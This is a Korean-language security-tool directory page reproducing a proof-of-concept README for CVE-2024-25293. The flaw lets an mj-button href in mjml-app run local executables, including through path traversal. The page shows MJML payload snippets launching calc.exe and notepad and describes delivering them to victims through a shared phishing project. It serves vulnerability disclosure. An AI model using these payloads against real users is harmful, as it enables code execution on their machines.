Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/eqstlab/cve-2024-25293
Phishing ToolsPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationMisconfiguration
GitHubeqstlab/cve-2024-25293

CVE-2024-25293

mjml-app v3.0.4 & 3.1.0-beta RCE 익스플로잇

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

MJML 로컬 코드 실행 PoC

CVE-2024-25293 취약점에 대한 개념 증명(PoC)입니다.

mjml-app v3.0.4 및 3.1.0-beta에서 원격 코드 실행(RCE)이 발견되었습니다. 이 저장소에는 취약한 애플리케이션 예제와 이에 대한 개념 증명(PoC) 익스플로잇이 포함되어 있습니다.

PoC로 프로세스를 자동화하는 python 파일이 있습니다.

1. 취약점 개요:

  • 취약점 주제: 로컬 코드 실행
  • 취약점 버전: mjml-app 3.0.4-win 및 mjml-app 3.1.0-beta
  • 공격 유형: 원격 코드 실행
  • 공격 구성 요소: 영향을 받는 소스 코드 파일의 'mj-button' 태그에서 'href' 속성이 로컬 코드 실행을 가능하게 합니다.
  • 예약된 CVE 번호: CVE-2024-25293

2. 취약점 원인:

  • mjml-app 3.0.4-win 및 mjml-app 3.1.0 베타는 'mj-button' 태그의 보안 구성 오류로 인해 임의 코드 실행이 발생할 수 있습니다.
  • 익스플로잇 설명
    • mjml 애플리케이션에서 이벤트 태그를 통해 로컬 파일을 실행하는 것은 보안 위협을 초래합니다. 또한 애플리케이션 내에서 경로 탐색(Path Traversal)을 결합하여 코드를 실행할 수 있으므로 패치가 필요합니다. image

개념 증명 (POC)

1단계) 공격자는 'href' 태그가 있는 'mj-button'을 생성하고

  • 사례 1) 경로 탐색을 통한 코드 실행 (notepad.exe)
  • 사례 2) 코드 실행 (calc.exe)
root@kitploit:~
<mjml>
  <mj-body>
    <mj-section>
      <mj-column>
        <mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
        <mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
      </mj-column>
    </mj-section>
  </mj-body>
</mjml>

mjml1

2단계) 공격자는 다음 코드로 주요 피싱 프로젝트를 생성합니다.

root@kitploit:~
<!-- header.mjml -->
<mj-section>
  <mj-column>
    <mj-text>This is a demo jruru</mj-text>
  </mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

mjml2

3단계) 피해자가 공유된 프로젝트를 열고 버튼을 클릭하면 페이로드(예: calc, notepad)가 실행됩니다. mjml3


3. 추가 정보

애플리케이션 내에서 href 태그를 통해 exe 파일을 실행하는 것은 위험하며, 경로 탐색과 결합하여 파일을 실행하는 것은 보안 문제입니다. 이로 인해 피싱 프로젝트를 생성 및 배포하여 로컬 파일을 실행할 수 있습니다. 따라서 이러한 실행을 방지하기 위해 이 기능을 수정하는 것이 필수적입니다.

도구 다운로드